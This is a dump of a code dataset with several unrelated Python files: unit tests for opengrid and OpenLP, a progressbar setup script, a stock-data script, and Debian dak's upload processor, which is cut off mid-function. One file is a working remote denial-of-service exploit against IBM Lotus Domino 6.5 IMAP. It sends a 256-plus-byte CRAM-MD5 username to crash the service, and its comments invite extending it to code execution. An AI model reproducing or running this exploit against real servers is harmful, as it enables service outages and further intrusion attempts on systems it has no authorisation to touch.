code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
This test is a combination of unit and integration test.
It makes a connection with google spreadsheets to get a dummy test version of the
houseprint sheet. The sheet is called "unit and integration test houseprint"
Open that sheet to check some of the tests.
Created on Mon Dec 30 02:37:25 2013
@author: roel
"""
import os, sys
import unittest
import inspect
test_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# add the path to opengrid to sys.path
sys.path.append(os.path.join(test_dir, os.pardir, os.pardir))
from opengrid.library.houseprint import houseprint
class HouseprintTest(unittest.TestCase):
    """
    Integration tests for the houseprint.Houseprint class.

    The fixture data lives in a Google spreadsheet named
    "unit and integration test houseprint"; open that sheet to cross-check
    the literal values asserted below.
    """
    @classmethod
    def setUpClass(cls):
        """
        Make the connection to the google drive spreadsheet only once.
        This makes the test rather an integration than a unit test.
        All tests can use self.hp as the houseprint object
        """
        cls.hp = houseprint.Houseprint(spreadsheet="unit and integration test houseprint")
    @classmethod
    def tearDownClass(cls):
        # Nothing to clean up: the spreadsheet is only read, never written.
        pass
    def test_parsing_sites(self):
        """Test parsing the sites"""
        # check the site keys
        sitekeys = [x.key for x in self.hp.sites]
        self.assertListEqual(sitekeys, list(range(1,8)))
        # some random attribute tests (values match the spreadsheet fixture)
        self.assertEqual(self.hp.sites[6].size, 180)
        self.assertEqual(self.hp.sites[5].inhabitants, 5)
        self.assertEqual(self.hp.sites[4].postcode, 5000)
        self.assertEqual(self.hp.sites[3].construction_year, 1950)
        self.assertEqual(self.hp.sites[2].epc_cert, 102.27)
        self.assertEqual(self.hp.sites[1].k_level, "")
    def test_parsing_devices(self):
        """Test parsing devices"""
        devicekeys = ["FL03001001","FL03001002","FL03001003a","FL03001003b","FL03001004","FL03001005","FL03001006","FL03001007"]
        self.assertEqual([x.key for x in self.hp.get_devices()], devicekeys)
        # second device belongs to site 2 in the fixture sheet
        self.assertEqual(self.hp.get_devices()[1].site.key, 2)
    def test_parsing_sensors(self):
        """Test parsing of sensors"""
        sensorkeys = ['s'+ str(x) for x in range(1,21)]
        self.assertListEqual([x.key for x in self.hp.get_sensors()], sensorkeys)
        # test a specific sensor
        s12 = self.hp.get_sensors()[11]
        self.assertEqual(s12.key, 's12')
        self.assertEqual(s12.token, 't12')
        self.assertEqual(s12.device.key, 'FL03001002')
        self.assertEqual(s12.type, 'water')
        self.assertEqual(s12.description, 'Water house')
    def test_get_sensors_by_type(self):
        """Searching for sensors by type should return only concerned sensors"""
        watersensors = self.hp.get_sensors(sensortype='water')
        self.assertEqual([x.key for x in watersensors], ['s6', 's12', 's13'])
    def test_search_sites(self):
        """Searching sites based on site attributes"""
        self.assertEqual(4, self.hp.search_sites(key=4)[0].key)
        sites_with_3_inhabitants = self.hp.search_sites(inhabitants=3)
        self.assertEqual([3,4], [x.key for x in sites_with_3_inhabitants])
    def test_search_sensors(self):
        """Searching sensors based on sensor attributes"""
        sensors = self.hp.search_sensors(system='grid')
        self.assertEqual(['s1', 's2'], [x.key for x in sensors])
        sensors = self.hp.search_sensors(type='electricity', direction='Import')
        self.assertEqual(['s2'], [x.key for x in sensors])
    def test_save_and_load(self):
        """Save a HP and load it back"""
        self.hp.init_tmpo()
        self.hp.save('test_saved_hp.hp')
        hp2 = houseprint.load_houseprint_from_file('test_saved_hp.hp')
        # Just comparing the old and new hp does not work: the sensors have the
        # same attributes, but are different objects (different location in memory)
        # As a solution, we check some of their attributes
        s1_old = self.hp.get_sensors()[0]
        s1_new = hp2.get_sensors()[0]
        self.assertEqual(s1_old.site.key, s1_new.site.key)
        for x in ["key", "type", "description", "system", "quantity", "unit", "direction", "tariff"]:
            self.assertEqual(s1_old.__dict__[x], s1_new.__dict__[x])
        # The tmpo session must survive a save/load round trip.
        self.assertIsNotNone(self.hp.get_tmpos())
        self.hp.save('test_saved_hp.hp')
        self.assertIsNotNone(self.hp.get_tmpos())
if __name__ == '__main__':
    # Run the tests in source order rather than the default alphabetical order.
    # http://stackoverflow.com/questions/4005695/changing-order-of-unit-tests-in-python
    if sys.version_info.major == 3: #compatibility python 3
        ln = lambda f: getattr(HouseprintTest, f).__code__.co_firstlineno #functions have renamed attributes
        lncmp = lambda _, a, b: (ln(a) > ln(b)) - (ln(a) < ln(b)) #cmp() was deprecated, see https://docs.python.org/3.0/whatsnew/3.0.html
    else:
        ln = lambda f: getattr(HouseprintTest, f).im_func.func_code.co_firstlineno
        lncmp = lambda _, a, b: cmp(ln(a), ln(b))
    # The first lambda argument absorbs the TestLoader instance, since the
    # comparator is looked up as a method on the loader.
    unittest.TestLoader.sortTestMethodsUsing = lncmp
    #unittest.main()
    suite1 = unittest.TestLoader().loadTestsFromTestCase(HouseprintTest)
    alltests = unittest.TestSuite([suite1])
    #selection = unittest.TestSuite()
    #selection.addTest(HouseprintTest('test_get_sensor'))
    unittest.TextTestRunner(verbosity=1, failfast=False).run(alltests)
|
EnergyID/opengrid
|
tests/test_houseprint.py
|
Python
|
gpl-2.0
| 5,610
|
# -*- coding: utf-8 -*-
# vim: autoindent shiftwidth=4 expandtab textwidth=120 tabstop=4 softtabstop=4
###############################################################################
# OpenLP - Open Source Lyrics Projection #
# --------------------------------------------------------------------------- #
# Copyright (c) 2008-2015 OpenLP Developers #
# --------------------------------------------------------------------------- #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation; version 2 of the License. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; if not, write to the Free Software Foundation, Inc., 59 #
# Temple Place, Suite 330, Boston, MA 02111-1307 USA #
###############################################################################
"""
This module contains tests for the lib submodule of the Bibles plugin.
"""
from unittest import TestCase
from openlp.plugins.bibles import lib
from openlp.plugins.bibles.lib import SearchResults
from tests.functional import MagicMock, patch
class TestLib(TestCase):
    """
    Test the functions in the :mod:`lib` module.
    """
    def get_reference_separator_test(self):
        """
        Test the get_reference_separator method
        """
        # GIVEN: A list of expected separators
        separators = {'sep_r': '\\s*(?:e)\\s*', 'sep_e_default': 'end', 'sep_v_display': 'w', 'sep_l_display': 'r',
                      'sep_v_default': ':|v|V|verse|verses', 'sep_l': '\\s*(?:r)\\s*', 'sep_l_default': ',|and',
                      'sep_e': '\\s*(?:t)\\s*', 'sep_v': '\\s*(?:w)\\s*', 'sep_r_display': 'e', 'sep_r_default': '-|to'}
        def side_effect():
            lib.REFERENCE_SEPARATORS = separators
        with patch('openlp.plugins.bibles.lib.update_reference_separators',
                   **{'side_effect': side_effect}) as mocked_update_reference_separators:
            # WHEN: Calling get_reference_separator
            for key, value in separators.items():
                ret = lib.get_reference_separator(key)
                # THEN: get_reference_separator should return the correct separator
                # Bug fix: the original asserted separators[key] == value, which is
                # trivially true and never actually checked the returned value.
                self.assertEqual(ret, value)
            mocked_update_reference_separators.assert_called_once_with()
    def search_results_creation_test(self):
        """
        Test the creation and construction of the SearchResults class
        """
        # GIVEN: A book, chapter and a verse list
        book = 'Genesis'
        chapter = 1
        verse_list = {
            1: 'In the beginning God created the heavens and the earth.',
            2: 'The earth was without form and void, and darkness was over the face of the deep. And the Spirit of '
               'God was hovering over the face of the waters.'
        }
        # WHEN: We create the search results object
        search_results = SearchResults(book, chapter, verse_list)
        # THEN: It should have a book, a chapter and a verse list
        self.assertIsNotNone(search_results, 'The search_results object should not be None')
        self.assertEqual(search_results.book, book, 'The book should be "Genesis"')
        self.assertEqual(search_results.chapter, chapter, 'The chapter should be 1')
        self.assertDictEqual(search_results.verse_list, verse_list, 'The verse lists should be identical')
    def search_results_has_verse_list_test(self):
        """
        Test that a SearchResults object with a valid verse list returns True when checking ``has_verse_list()``
        """
        # GIVEN: A valid SearchResults object with a proper verse list
        search_results = SearchResults('Genesis', 1, {1: 'In the beginning God created the heavens and the earth.'})
        # WHEN: We check that the SearchResults object has a verse list
        has_verse_list = search_results.has_verse_list()
        # THEN: It should be True
        self.assertTrue(has_verse_list, 'The SearchResults object should have a verse list')
    def search_results_has_no_verse_list_test(self):
        """
        Test that a SearchResults object with an empty verse list returns False when checking ``has_verse_list()``
        """
        # GIVEN: A valid SearchResults object with an empty verse list
        search_results = SearchResults('Genesis', 1, {})
        # WHEN: We check that the SearchResults object has a verse list
        has_verse_list = search_results.has_verse_list()
        # THEN: It should be False
        self.assertFalse(has_verse_list, 'The SearchResults object should have a verse list')
|
crossroadchurch/paul
|
tests/functional/openlp_plugins/bibles/test_lib.py
|
Python
|
gpl-2.0
| 5,304
|
#!/usr/bin/python
import os
from setuptools import setup, find_packages
import progressbar
# TODO: I don't believe this should be in here. This should be done on package
# creation only
try:
    # Regenerate README.txt from the package docstring when it is missing or
    # older than progressbar/__init__.py.
    readme = 'README.txt'
    info = 'progressbar/__init__.py'
    if (not os.path.exists(readme) or
            os.stat(info).st_mtime > os.stat(readme).st_mtime):
        # Context manager ensures the file handle is closed even on error.
        with open(readme, 'w') as readme_file:
            readme_file.write(progressbar.__doc__)
except Exception:
    # Best-effort only: failing to (re)generate the README must never break
    # installation.  Narrowed from a bare ``except`` so that SystemExit and
    # KeyboardInterrupt still propagate.
    pass
setup(
    name='progressbar',
    version=progressbar.__version__,
    packages=find_packages(),
    # First docstring line doubles as the short description.
    description=progressbar.__doc__.split('\n')[0],
    long_description=progressbar.__doc__,
    author=progressbar.__author__,
    maintainer=progressbar.__author__,
    author_email=progressbar.__author_email__,
    maintainer_email=progressbar.__author_email__,
    url='http://code.google.com/p/python-progressbar',
    license='LICENSE.txt',
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Console',
        'Intended Audience :: Developers',
        'Intended Audience :: Information Technology',
        'Intended Audience :: System Administrators',
        'License :: OSI Approved :: '
        'GNU Library or Lesser General Public License (LGPL)',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.4',
        'Programming Language :: Python :: 2.5',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Topic :: Software Development :: Libraries',
        'Topic :: Software Development :: User Interfaces',
        'Topic :: Terminals'
    ],
)
|
henrythasler/TileGenerator
|
docs/progressbar-2.3/setup.py
|
Python
|
gpl-2.0
| 1,821
|
#!/usr/bin/env python
# -*- coding:gbk -*-
import sys
import re
import os
import string
import urllib
import urllib2
import datetime
import binascii
import shutil
#from openpyxl import Workbook
#from openpyxl.reader.excel import load_workbook
#from internal.common import *
#from internal.ts_common import *
from internal.tingfupai import *
from internal.trade_date import *
from internal.url_juchao.tips_res import *
#Main
if __name__=="__main__":
    curdate = ''
    bLast = 0
    #curdate, bLast = get_date_with_last()
    # Operate on the last trading day; bLast==1 selects "latest day" mode below.
    curdate = get_lastday()
    bLast = 1
    print curdate, bLast
    # Fetch the day's trading-resumption ("fupai") announcements.
    res_data = get_tingfupai_res(curdate)
    if res_data is None:
        exit(0)
    stockCode = []
    stockName = []
    totalline = 0
    prepath = "../data/"
    prepath1 = "../data/entry/fupai/"
    filename = prepath + 'fupai'
    filetxt = filename + '.txt'
    fl = open(filetxt, 'w')
    # Fills stockCode/stockName in place and returns the number of records written.
    totalline = get_all_fupai_data(res_data, fl, 0, curdate, stockCode, stockName)
    # Aggregate all the data and write it out (translated from a GBK comment).
    if bLast==1:
        list_stock_rt(stockCode, curdate, fl)
    else:
        if bLast==0:
            list_fupai_trade(stockCode, stockName, curdate, fl)
    fl.close()
    if (totalline==0):
        # No records: remove the empty output file.
        print "No Matched Record"
        os.remove(filetxt)
    else:
        # Archive a dated copy under ../data/entry/fupai/.
        prepath1 = prepath1 + "fupai" + curdate + ".txt"
        shutil.copy(filetxt, prepath1)
|
yudingding6197/fin_script
|
fupai.py
|
Python
|
gpl-2.0
| 1,247
|
#!/usr/bin/python
#
# Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows
# 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS
# where 256+ (but no more than 270) bytes for the username crashes the service
# this is likely to work on other windows platform aswell. Maybe someone can carry this further and come out
# with a code exec exploit.
#
# Author shall bear no reponsibility for any screw ups caused by using this code
# Winny Thomas :-)
#
import sys
import md5
import struct
import base64
import socket
def ExploitLotus(target):
    """Connect to the IMAP service (port 143) on *target* and send the
    oversized CRAM-MD5 login that crashes Lotus Domino 6.5 (denial of
    service)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, 143))
    response = sock.recv(1024)
    print response
    auth = 'a001 authenticate cram-md5\r\n'
    sock.send(auth)
    response = sock.recv(1024)
    print response
    # prepare digest of the response from server
    m = md5.new()
    # NOTE(review): response[2:0] is always the empty slice, so this digests
    # an empty string.  Presumably response[2:] was intended -- confirm.
    m.update(response[2:0])
    digest = m.digest()
    # 256+ filler bytes for the username trigger the overflow.
    payload = 'A' * 256
    # the following DWORD is stored in ECX
    # at the time of overflow the following call is made
    # call dword ptr [ecx]. However i couldnt find suitable conditions under which a stable pointer to our shellcode
    # could be used. Actually i have not searched hard enough :-).
    payload += struct.pack('<L', 0x58585858)
    # Base64 encode the user info to the server
    login = payload + ' ' + digest
    login = base64.encodestring(login) + '\r\n'
    sock.send(login)
    response = sock.recv(1024)
    print response
if __name__=="__main__":
    # The IMAP server address is the only command-line argument.
    try:
        target = sys.argv[1]
    except IndexError:
        print 'Usage: %s <imap server>\n' % sys.argv[0]
        sys.exit(-1)
    ExploitLotus(target)
|
knightmare2600/d4rkc0de
|
exploits/070329.py
|
Python
|
gpl-2.0
| 1,818
|
#!/usr/bin/env python
"""
Checks Debian packages from Incoming
@contact: Debian FTP Master <ftpmaster@debian.org>
@copyright: 2000, 2001, 2002, 2003, 2004, 2005, 2006 James Troup <james@nocrew.org>
@copyright: 2009 Joerg Jaspert <joerg@debian.org>
@copyright: 2009 Mark Hymers <mhy@debian.org>
@copyright: 2009 Frank Lichtenheld <djpig@debian.org>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# based on process-unchecked and process-accepted
## pu|pa: locking (daily.lock)
## pu|pa: parse arguments -> list of changes files
## pa: initialize urgency log
## pu|pa: sort changes list
## foreach changes:
### pa: load dak file
## pu: copy CHG to tempdir
## pu: check CHG signature
## pu: parse changes file
## pu: checks:
## pu: check distribution (mappings, rejects)
## pu: copy FILES to tempdir
## pu: check whether CHG already exists in CopyChanges
## pu: check whether FILES already exist in one of the policy queues
## for deb in FILES:
## pu: extract control information
## pu: various checks on control information
## pu|pa: search for source (in CHG, projectb, policy queues)
## pu|pa: check whether "Version" fulfills target suite requirements/suite propagation
## pu|pa: check whether deb already exists in the pool
## for src in FILES:
## pu: various checks on filenames and CHG consistency
## pu: if isdsc: check signature
## for file in FILES:
## pu: various checks
## pu: NEW?
## //pu: check whether file already exists in the pool
## pu: store what "Component" the package is currently in
## pu: check whether we found everything we were looking for in CHG
## pu: check the DSC:
## pu: check whether we need and have ONE DSC
## pu: parse the DSC
## pu: various checks //maybe drop some of the in favor of lintian
## pu|pa: check whether "Version" fulfills target suite requirements/suite propagation
## pu: check whether DSC_FILES is consistent with "Format"
## for src in DSC_FILES:
## pu|pa: check whether file already exists in the pool (with special handling for .orig.tar.gz)
## pu: create new tempdir
## pu: create symlink mirror of source
## pu: unpack source
## pu: extract changelog information for BTS
## //pu: create missing .orig symlink
## pu: check with lintian
## for file in FILES:
## pu: check checksums and sizes
## for file in DSC_FILES:
## pu: check checksums and sizes
## pu: CHG: check urgency
## for deb in FILES:
## pu: extract contents list and check for dubious timestamps
## pu: check that the uploader is actually allowed to upload the package
### pa: install:
### if stable_install:
### pa: remove from p-u
### pa: add to stable
### pa: move CHG to morgue
### pa: append data to ChangeLog
### pa: send mail
### pa: remove .dak file
### else:
### pa: add dsc to db:
### for file in DSC_FILES:
### pa: add file to file
### pa: add file to dsc_files
### pa: create source entry
### pa: update source associations
### pa: update src_uploaders
### for deb in FILES:
### pa: add deb to db:
### pa: add file to file
### pa: find source entry
### pa: create binaries entry
### pa: update binary associations
### pa: .orig component move
### pa: move files to pool
### pa: save CHG
### pa: move CHG to done/
### pa: change entry in queue_build
## pu: use dispatch table to choose target queue:
## if NEW:
## pu: write .dak file
## pu: move to NEW
## pu: send mail
## elsif AUTOBYHAND:
## pu: run autobyhand script
## pu: if stuff left, do byhand or accept
## elsif targetqueue in (oldstable, stable, embargo, unembargo):
## pu: write .dak file
## pu: check overrides
## pu: move to queue
## pu: send mail
## else:
## pu: write .dak file
## pu: move to ACCEPTED
## pu: send mails
## pu: create files for BTS
## pu: create entry in queue_build
## pu: check overrides
# Integrity checks
## GPG
## Parsing changes (check for duplicates)
## Parse dsc
## file list checks
# New check layout (TODO: Implement)
## Permission checks
### suite mappings
### ACLs
### version checks (suite)
### override checks
## Source checks
### copy orig
### unpack
### BTS changelog
### src contents
### lintian
### urgency log
## Binary checks
### timestamps
### control checks
### src relation check
### contents
## Database insertion (? copy from stuff)
### BYHAND / NEW / Policy queues
### Pool
## Queue builds
import datetime
import errno
import fcntl
import os
import sys
import traceback
import apt_pkg
import time
from sqlalchemy.orm.exc import NoResultFound
from daklib import daklog
from daklib.dbconn import *
from daklib.urgencylog import UrgencyLog
from daklib.summarystats import SummaryStats
from daklib.config import Config
import daklib.utils as utils
from daklib.regexes import *
import daklib.announce
import daklib.archive
import daklib.checks
import daklib.upload
###############################################################################
# Module-level state, both initialised in main().
Options = None  # "Dinstall::Options" configuration subtree
Logger = None  # daklog.Logger instance used throughout this module
###############################################################################
def usage (exit_code=0):
    """Print the command-line help and terminate with *exit_code*."""
    print """Usage: dak process-upload [OPTION]... [CHANGES]...
-a, --automatic automatic run
-d, --directory <DIR> process uploads in <DIR>
-h, --help show this help and exit.
-n, --no-action don't do anything
-p, --no-lock don't check lockfile !! for cron.daily only !!
-s, --no-mail don't send any mail
-V, --version display the version number and exit"""
    sys.exit(exit_code)
###############################################################################
def try_or_reject(function):
    """Try to call function or reject the upload if that fails

    Decorator for upload-processing steps: daklib rejection errors and any
    unexpected exception cause the upload to be rolled back and rejected.
    If rejecting fails once, it is retried with notification disabled
    before giving up.
    """
    def wrapper(directory, upload, *args, **kwargs):
        reason = 'No exception caught. This should not happen.'
        try:
            return function(directory, upload, *args, **kwargs)
        except (daklib.archive.ArchiveException, daklib.checks.Reject) as e:
            # Expected rejection: the exception text is the reject reason.
            reason = unicode(e)
        except Exception as e:
            reason = "There was an uncaught exception when processing your upload:\n{0}\nAny original reject reason follows below.".format(traceback.format_exc())
        try:
            upload.rollback()
            return real_reject(directory, upload, reason=reason)
        except Exception as e:
            reason = "In addition there was an exception when rejecting the package:\n{0}\nPrevious reasons:\n{1}".format(traceback.format_exc(), reason)
            upload.rollback()
            # Second attempt: skip notification, just record the rejection.
            return real_reject(directory, upload, reason=reason, notify=False)
        # Defensive: only reached if a reject attempt neither returned nor raised.
        raise Exception('Rejecting upload failed after multiple tries. Giving up. Last reason:\n{0}'.format(reason))
    return wrapper
def get_processed_upload(upload):
    """Build a daklib.announce.ProcessedUpload from *upload*.

    Collects the metadata the announcement mails need: maintainer,
    fingerprint, target suites, the raw .changes file contents, closed
    bugs and accumulated warnings.
    """
    changes = upload.changes
    control = upload.changes.changes
    pu = daklib.announce.ProcessedUpload()
    pu.maintainer = control.get('Maintainer')
    pu.changed_by = control.get('Changed-By')
    pu.fingerprint = changes.primary_fingerprint
    pu.suites = upload.final_suites or []
    pu.from_policy_suites = []
    # Use a context manager so the file handle is closed promptly instead of
    # leaking until garbage collection (the original left it open).
    with open(upload.changes.path, 'r') as changes_fd:
        pu.changes = changes_fd.read()
    pu.changes_filename = upload.changes.filename
    pu.sourceful = upload.changes.sourceful
    pu.source = control.get('Source')
    pu.version = control.get('Version')
    pu.architecture = control.get('Architecture')
    pu.bugs = changes.closed_bugs
    pu.program = "process-upload"
    pu.warnings = upload.warnings
    return pu
@try_or_reject
def accept(directory, upload):
    """Install *upload* into the archive and do post-accept bookkeeping.

    Logs the accept, archives buildinfo files, records urgency for
    sourceful uploads, sends the accept announcement and moves the
    .changes file to the done directory when the upload went to a real
    suite (not a policy queue).
    """
    cnf = Config()
    Logger.log(['ACCEPT', upload.changes.filename])
    print "ACCEPT"
    upload.install()
    process_buildinfos(upload)
    # A "real" suite has no policy queue in front of it.
    accepted_to_real_suite = any(suite.policy_queue is None for suite in upload.final_suites)
    sourceful_upload = 'source' in upload.changes.architectures
    control = upload.changes.changes
    if sourceful_upload and not Options['No-Action']:
        urgency = control.get('Urgency')
        # As per policy 5.6.17, the urgency can be followed by a space and a
        # comment. Extract only the urgency from the string.
        if ' ' in urgency:
            (urgency, comment) = urgency.split(' ', 1)
        if urgency not in cnf.value_list('Urgency::Valid'):
            urgency = cnf['Urgency::Default']
        UrgencyLog().log(control['Source'], control['Version'], urgency)
    pu = get_processed_upload(upload)
    daklib.announce.announce_accept(pu)
    # Move .changes to done, but only for uploads that were accepted to a
    # real suite. process-policy will handle this for uploads to queues.
    if accepted_to_real_suite:
        src = os.path.join(upload.directory, upload.changes.filename)
        now = datetime.datetime.now()
        donedir = os.path.join(cnf['Dir::Done'], now.strftime('%Y/%m/%d'))
        dst = os.path.join(donedir, upload.changes.filename)
        dst = utils.find_next_free(dst)
        upload.transaction.fs.copy(src, dst, mode=0o644)
    SummaryStats().accept_count += 1
    SummaryStats().accept_bytes += upload.changes.bytes
@try_or_reject
def accept_to_new(directory, upload):
    """Install *upload* into the NEW queue and send the NEW announcement."""
    Logger.log(['ACCEPT-TO-NEW', upload.changes.filename])
    print "ACCEPT-TO-NEW"
    upload.install_to_new()
    # TODO: tag bugs pending
    pu = get_processed_upload(upload)
    daklib.announce.announce_new(pu)
    SummaryStats().accept_count += 1
    SummaryStats().accept_bytes += upload.changes.bytes
@try_or_reject
def reject(directory, upload, reason=None, notify=True):
    """Reject *upload*; the try_or_reject wrapper provides error recovery."""
    real_reject(directory, upload, reason, notify)
def real_reject(directory, upload, reason=None, notify=True):
    """Reject *upload*: copy its files to Dir::Reject, write a .reason file
    and optionally send the reject notification.

    Unlike reject(), this is not wrapped by try_or_reject, so it can be
    called from inside the error handler itself.
    """
    # XXX: rejection itself should go to daklib.archive.ArchiveUpload
    cnf = Config()
    Logger.log(['REJECT', upload.changes.filename])
    print "REJECT"
    fs = upload.transaction.fs
    rejectdir = cnf['Dir::Reject']
    files = [ f.filename for f in upload.changes.files.itervalues() ]
    files.append(upload.changes.filename)
    for fn in files:
        src = os.path.join(upload.directory, fn)
        dst = utils.find_next_free(os.path.join(rejectdir, fn))
        if not os.path.exists(src):
            continue
        fs.copy(src, dst)
    # Combine the caller-supplied reason with any reasons collected on the
    # upload object itself.
    if upload.reject_reasons is not None:
        if reason is None:
            reason = ''
        reason = reason + '\n' + '\n'.join(upload.reject_reasons)
    if reason is None:
        reason = '(Unknown reason. Please check logs.)'
    dst = utils.find_next_free(os.path.join(rejectdir, '{0}.reason'.format(upload.changes.filename)))
    fh = fs.create(dst)
    fh.write(reason)
    fh.close()
    if notify:
        pu = get_processed_upload(upload)
        daklib.announce.announce_reject(pu, reason)
    SummaryStats().reject_count += 1
###############################################################################
def action(directory, upload):
    """Decide what to do with *upload*: accept, reject, send to NEW, skip
    or quit.

    In automatic mode the answer is chosen without prompting; otherwise
    the operator is asked.  Returns True when the upload was processed
    (i.e. not skipped).
    """
    changes = upload.changes
    processed = True
    global Logger
    cnf = Config()
    # Run all checks; okay is falsy when reject reasons were collected.
    okay = upload.check()
    summary = changes.changes.get('Changes', '')
    package_info = []
    if okay:
        if changes.source is not None:
            package_info.append("source:{0}".format(changes.source.dsc['Source']))
        for binary in changes.binaries:
            package_info.append("binary:{0}".format(binary.control['Package']))
    (prompt, answer) = ("", "XXX")
    if Options["No-Action"] or Options["Automatic"]:
        answer = 'S'
    print summary
    print
    print "\n".join(package_info)
    print
    if len(upload.warnings) > 0:
        print "\n".join(upload.warnings)
        print
    if len(upload.reject_reasons) > 0:
        print "Reason:"
        print "\n".join(upload.reject_reasons)
        print
        path = os.path.join(directory, changes.filename)
        created = os.stat(path).st_mtime
        now = time.time()
        too_new = (now - created < int(cnf['Dinstall::SkipTime']))
        if too_new:
            # A very fresh upload may still be incomplete: skip, don't reject.
            print "SKIP (too new)"
            prompt = "[S]kip, Quit ?"
        else:
            prompt = "[R]eject, Skip, Quit ?"
            if Options["Automatic"]:
                answer = 'R'
    elif upload.new:
        prompt = "[N]ew, Skip, Quit ?"
        if Options['Automatic']:
            answer = 'N'
    else:
        prompt = "[A]ccept, Skip, Quit ?"
        if Options['Automatic']:
            answer = 'A'
    # Interactive loop: keep asking until the answer matches one of the
    # prompt's options; an empty answer selects the bracketed default.
    while prompt.find(answer) == -1:
        answer = utils.our_raw_input(prompt)
        m = re_default_answer.match(prompt)
        if answer == "":
            answer = m.group(1)
        answer = answer[:1].upper()
    if answer == 'R':
        reject(directory, upload)
    elif answer == 'A':
        # upload.try_autobyhand must not be run with No-Action.
        if Options['No-Action']:
            accept(directory, upload)
        elif upload.try_autobyhand():
            accept(directory, upload)
        else:
            print "W: redirecting to BYHAND as automatic processing failed."
            accept_to_new(directory, upload)
    elif answer == 'N':
        accept_to_new(directory, upload)
    elif answer == 'Q':
        sys.exit(0)
    elif answer == 'S':
        processed = False
    if not Options['No-Action']:
        upload.commit()
    return processed
###############################################################################
def unlink_if_exists(path):
    """Delete *path*; a file that is already missing is not an error.

    Any OSError other than ENOENT is propagated to the caller.
    """
    try:
        os.unlink(path)
    except OSError as err:
        # Already gone is fine; everything else is a real failure.
        if err.errno == errno.ENOENT:
            return
        raise
def process_it(directory, changes, keyrings):
    """Process a single .changes file and clean up its files afterwards."""
    global Logger
    print "\n{0}\n".format(changes.filename)
    Logger.log(["Processing changes file", changes.filename])
    with daklib.archive.ArchiveUpload(directory, changes, keyrings) as upload:
        processed = action(directory, upload)
        if processed and not Options['No-Action']:
            # Record the signature so replays of the same signed file can be
            # detected later.
            session = DBConn().session()
            history = SignatureHistory.from_signed_file(upload.changes)
            if history.query(session) is None:
                session.add(history)
                session.commit()
            session.close()
            # Remove the processed files from the incoming directory.
            unlink_if_exists(os.path.join(directory, changes.filename))
            for fn in changes.files:
                unlink_if_exists(os.path.join(directory, fn))
###############################################################################
def process_changes(changes_filenames):
    """Load each .changes file and run it through process_it().

    Active keyrings are looked up once, ordered by priority; loadable
    changes are processed sorted by their Changes object ordering.
    """
    session = DBConn().session()
    keyrings = session.query(Keyring).filter_by(active=True).order_by(Keyring.priority)
    keyring_files = [ k.keyring_name for k in keyrings ]
    session.close()
    changes = []
    for fn in changes_filenames:
        try:
            directory, filename = os.path.split(fn)
            c = daklib.upload.Changes(directory, filename, keyring_files)
            changes.append([directory, c])
        except Exception as e:
            # NOTE(review): if os.path.split itself raised, ``filename`` would
            # be unbound here; in practice only the Changes() call raises.
            Logger.log([filename, "Error while loading changes: {0}".format(e)])
    changes.sort(key=lambda x: x[1])
    for directory, c in changes:
        process_it(directory, c, keyring_files)
def process_buildinfos(upload):
    """Archive the upload's .buildinfo files under Dir::BuildinfoArchive.

    No-op when Dir::BuildinfoArchive is not configured.
    """
    cnf = Config()
    if 'Dir::BuildinfoArchive' not in cnf:
        return
    # Archived buildinfo files are grouped by date (YYYY/MM/DD).
    target_dir = os.path.join(
        cnf['Dir::BuildinfoArchive'],
        datetime.datetime.now().strftime('%Y/%m/%d'),
    )
    for f in upload.changes.buildinfo_files:
        src = os.path.join(upload.directory, f.filename)
        dst = utils.find_next_free(os.path.join(target_dir, f.filename))
        Logger.log(["Archiving", f.filename])
        upload.transaction.fs.copy(src, dst, mode=0o644)
###############################################################################
def main():
    """Entry point for dak process-upload: parse options, take the lock,
    process all given/found .changes files and print summary statistics."""
    global Options, Logger
    cnf = Config()
    summarystats = SummaryStats()
    Arguments = [('a',"automatic","Dinstall::Options::Automatic"),
                 ('h',"help","Dinstall::Options::Help"),
                 ('n',"no-action","Dinstall::Options::No-Action"),
                 ('p',"no-lock", "Dinstall::Options::No-Lock"),
                 ('s',"no-mail", "Dinstall::Options::No-Mail"),
                 ('d',"directory", "Dinstall::Options::Directory", "HasArg")]
    # Make sure every option key exists in the config so lookups don't fail.
    for i in ["automatic", "help", "no-action", "no-lock", "no-mail",
              "version", "directory"]:
        key = "Dinstall::Options::%s" % i
        if key not in cnf:
            cnf[key] = ""
    changes_files = apt_pkg.parse_commandline(cnf.Cnf, Arguments, sys.argv)
    Options = cnf.subtree("Dinstall::Options")
    if Options["Help"]:
        usage()
    # -n/--dry-run invalidates some other options which would involve things happening
    if Options["No-Action"]:
        Options["Automatic"] = ""
    # Obtain lock if not in no-action mode and initialize the log
    if not Options["No-Action"]:
        lock_fd = os.open(os.path.join(cnf["Dir::Lock"], 'process-upload.lock'), os.O_RDWR | os.O_CREAT)
        try:
            # Non-blocking exclusive lock: fail fast if another run is active.
            fcntl.flock(lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
